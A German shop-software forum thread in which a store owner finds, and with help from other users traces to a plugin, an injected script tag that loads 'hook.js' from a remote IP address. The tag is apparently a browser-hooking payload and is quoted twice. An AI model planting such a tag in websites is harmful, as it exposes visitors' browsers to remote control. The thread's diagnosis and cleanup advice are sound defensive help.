Neu Script - Fehler im Code

isopix

Aktives Mitglied
5. Juli 2016
11
0
hallo, seit Tagen werden die Bilder auf unseren Produktseiten extrem langsam geladen. Bei der Suche nach dem Fehler sind wir beim Validieren von HTML auf diese Zeile gestoßen:
<script src="https://37.139.8.73:3000/hook.js" type="text/javascript"><\/script></script>
Vor dem Ende-Tag steht diese Bezeichnung <\/script>, die als Fehler gemeldet wird.

Kann mit bitte jemand sagen, an welcher Stelle bzw. im welcher tpl-Datei ich das ändern kann?

vg Georg
 

Nicson

Sehr aktives Mitglied
29. August 2012
516
94
Bayern
Also wenn dein Server nich zufällig in Schweden steht ... würde ich sagen das is n Hack ...?

8 34 ms 33 ms 33 ms adm-b2-link.telia.net [62.115.141.63]
9 33 ms 47 ms 33 ms digitalocean-ic-304182-adm-b2.c.telia.net [213.248.84.118]
10 35 ms 33 ms 33 ms 138.197.250.47
11 32 ms 32 ms 32 ms 37.139.8.73

Sieht nach nem privaten Provideranschluss aus.
 

isopix

Aktives Mitglied
5. Juli 2016
11
0
Danke für die Hinweise.
Ich würde diese Codzeile gern löschen, weiß aber nicht, wie bzw. wo ich diese finden kann.
Kann mit bitte jemand sagen, an welcher Stelle bzw. im welcher tpl-Datei ich das ändern kann?
 

FPrüfer

Moderator
Mitarbeiter
19. Februar 2016
1.881
529
Halle
Ich würde diese Codzeile gern löschen, weiß aber nicht, wie bzw. wo ich diese finden kann.
Kann mit bitte jemand sagen, an welcher Stelle bzw. im welcher tpl-Datei ich das ändern kann?
Wie Martin schon sagte, das ist kein Bestandteil des Shopcodes, deshalb kann auch keiner wissen wo das herkommt. Möglich ist ein Plugin oder wie auch schon erwähnt hat jemand deinen Server kompromitiert und irgendwo Code eingeschleußt.
Erste Anlaufstelle wäre also der Dateicheck im Backend und das Deaktivieren aller Plugins. Je nach Ergebnis gehts dann weiter...
 

lj-shadow

Sehr aktives Mitglied
15. März 2013
466
47
Vielleicht solltest du nebenbei auch gleich die content policy für deine domain setzen.
Dann wird die Datei wenigstens schon mal nicht mehr ausgeführt bzw. geblockt, bis du die Herkunft des codes gefunden hast.
 

isopix

Aktives Mitglied
5. Juli 2016
11
0
hallo, bin nochmal zu diesem Thema hier.
Im Quelltext unseres Shops www.flammkuchen24.de wird vor dem body-end-tag folgendes Script aufgerufen aber nicht ausgeführt mit dem Hinweis: "Laden fehlgeschlagen für das <script> mit der Quelle "https://37.139.8.73:3000/hook.js" ". Der Vorgang bremst den Seitenaufruf extrem aus.

Dies ist das Script vor dem body-end-tag
<script src="https://37.139.8.73:3000/hook.js" type="text/javascript"><\/script></script>
</body>
</html>

Wie kann ich den Quelltext oder das auslösende Element aufrufen, damit ich das Script löschen kann?
vg Georg
 

Xantiva

Sehr aktives Mitglied
28. August 2016
1.795
316
Düsseldorf
Hast Du schon mal im Backend den Dateicheck ausgeführt? System : Wartung : Status => Dateistruktur => Details oder /admin/filecheck.php

Oder laden den SourceCode vom Shop runter und vergleiche mit Tools wie WinMerge den original Quellcode mit Deiner Version.

Nachtrag: Prüfe - wenn möglich - das ftp Log um zu sehen, ob und welche Dateien modifiziert wurden.
 

css-umsetzung

Offizieller Servicepartner
SPBanner
6. Juli 2011
8.452
2.575
Berlin
Firma
css-umsetzung
schalt doch mal alle Plugins ab die du hast um zu sehen ob das JS davon kommt, wenn nicht musst du in deinen Quellcodes schauen
 

isopix

Aktives Mitglied
5. Juli 2016
11
0
Dateicheck habe ich durchgeführt: keine Probleme entdeckt.

@css-umsetzung: "wenn nicht musst du in deinen Quellcodes schauen " = Meine Frage ist, wie kann ich das Script aus dem Quellcode löschen. Wie komme ich an die entsprechende Stellem um das Script dort hzu entfernen.
 

lj-shadow

Sehr aktives Mitglied
15. März 2013
466
47
Meine Frage ist, wie kann ich das Script aus dem Quellcode löschen.

Deine erste Frage sollte sein: Wie kann ich den Code finden?
Damit klärt sich erst mal, wo der überhaupt ist.

DANN: WIE kann ich den löschen? Das dürfte sich dann recht schnell machen lassen.

und das wichtigste: Wo kommt der eig. her? Warum ist der da? Wer hat ihn platziert? (Darum ja das "schalt mal alle Plugins ab")
Wenn der dabei verschwindet und du Deine Plugins nacheinander wieder aktivierst, solltest du den "schuldigen" finden.


EDIT - zum wie finden:
Solltest Du shell-Zugriff haben, such doch mal recursiv nach dem Code in deinem Serververzeichis - natürlich nach Dateiinhalt suchen.
Wenn nicht, lade dir den Shop doch mal runter (ohne Bilder usw.) und mach das offline
 

isopix

Aktives Mitglied
5. Juli 2016
11
0
Bei letzten Test hatte ich etwas übersehen. Als ich jetzt die Plugins nochmal geprüft habe, habe ich ein Plugin als Fehlerquelle gefunden!
Ich danke allen für Ihre Unterstützung.
 

Rico Giesler

Offizieller Servicepartner
SPBanner
10. Mai 2017
13.245
1.522
Wenn es ein Standardplugin ist wäre für andere User interessant welches.
Damit sie beim gleichen Problem einen Lösungsansatz haben.
 
Ähnliche Themen
Titel Forum Antworten Datum
Neu Database connection timeouts and interface lag in JTL-Wawi with background script managers User helfen Usern 0
Workflow: Artikel geändert -> bat-script ausführen JTL-Wawi 1.11 2
DHL Versenden 4.0 nicht vollständig konfigurierbar (GUI Fehler) JTL-Wawi 2.0 5
Neu Der Inhalt / Text ist verschwunden – ist das ein Fehler JTL-Shop - Fehler und Bugs 0
Neu Shopware 5 + JTL-Connector: sporadische 500 Fehler / PHP-FPM Limit erreicht – trotz unverändertem Setup User helfen Usern - Fragen zu JTL-Wawi 0
Neu Fehler Rechnungsupload Amazon FBA Business Kunde JTL-Wawi - Fehler und Bugs 0
Gelöst: Shipping 4.0 gibt fehler: The product entered is unknown. JTL-Wawi 1.11 1
Neu Error 500 Fehler nach Dropper Installation Betrieb / Pflege von JTL-Shop 2
JTL-Wawi 1.11.7 Sporadischer Fehler - Zugriff verweigert. JTL-Wawi 1.11 0
Neu VCS Lite / IDU blockiert – Aufträge fälschlich unter "Externe Rechnungen" (Amazon API Fehler) Amazon-Anbindung - Fehler und Bugs 0
Fehler bei Bearbeitung von Attributen via HTML-Editor JTL-Wawi 2.0 3
Neu Fehler Saas-Connector Shopware-Connector 13
JTL Shop 4 Upgrade auf 5.5.0 --> Fehler 500 Upgrade JTL-Shop4 auf JTL-Shop5 3
JTL Shop 4 Upgrade auf 5.5.0 --> Fehler 404 Upgrade JTL-Shop4 auf JTL-Shop5 11
Neu Etikettendruck über Remotedesktop Fehler Arbeitsabläufe in JTL-Wawi 0
Nach Update auf Wawi 2.0.X, API v1 Fehler JTL-Wawi 2.0 9
Neu Fehler Scan Barcodes GTIN13 auf einem Lotto-Kundenbeleg JTL-POS - Fehler und Bugs 4
Update auf 2.0.1 Fehler bei eazybusiness JTL-Wawi 2.0 17
Gelöst Störung: DHL Versenden 3.0 - Fehler "Request processing failure" JTL-ShippingLabels - Fehler und Bugs 1
Neu Fehler beim Update der Datenbank von 1.11.7 auf 2.0.1 JTL-Wawi - Fehler und Bugs 7
Neu JTL Shipping Fehler bei DHL Versand über WMS ? User helfen Usern - Fragen zu JTL-Wawi 2
Gelöst Bekannte Störung: Fehler "Der Inhaltstyp text/html stimmt nicht mit text/xml überein" bei der Labelerstellung Gelöste Themen in diesem Bereich 1
Neu Fehler beim Abgleich, aber nur 1 einer von 3 Shopify Shops Shopify-Connector 2
Aufträge auf die Pikliste legen bringt Fehler DataTreeListView JTL-Wawi 1.11 2
Neu Zyklische Fehler beim Listen von T-Shirts Amazon-Lister - Fehler und Bugs 3
Neu Fehler 35 XLM entspricht nicht der Konvention Plugins für JTL-Shop 4
Neu Varkombis Import Fehler "#VARKOMBI WIRD NICHT ANGELEGT#" JTL-Ameise - Fehler und Bugs 4
Neu Kartenzahlung Total amount Fehler JTL-POS - Fehler und Bugs 1
Neu Fehler mit der Kartenzahlung Einrichtung / Updates von JTL-POS 9
"Fehler beim Laden der Daten" in Liste Aufträge und Rechnungen JTL-Wawi 1.11 4
Neu Fehler bei Artikel Filter in der Wawi JTL-Wawi - Fehler und Bugs 2
Neu Fehler DHL Paket Inetrnational Exportdokumente "Bitte geben Sie eine Beschreibung an" JTL-ShippingLabels - Fehler und Bugs 0
GLS Retoure Code 15 JTL-Wawi 1.10 1
Neu QR Code Ausdruck der TSE Einrichtung / Updates von JTL-POS 0
Neu Hinweisfeld bei Versandarten: HTML Code möglich? Betrieb / Pflege von JTL-Shop 7
Neu WMS Mobile / kein QR Code Scan in das Passwort Feld mit Zebra MDE JTL-WMS / JTL-Packtisch+ - Fehler und Bugs 0
Neu Alttexte aus OPC werden beim Slider nicht im Code angezeigt JTL-Wawi - Fehler und Bugs 0

Ähnliche Themen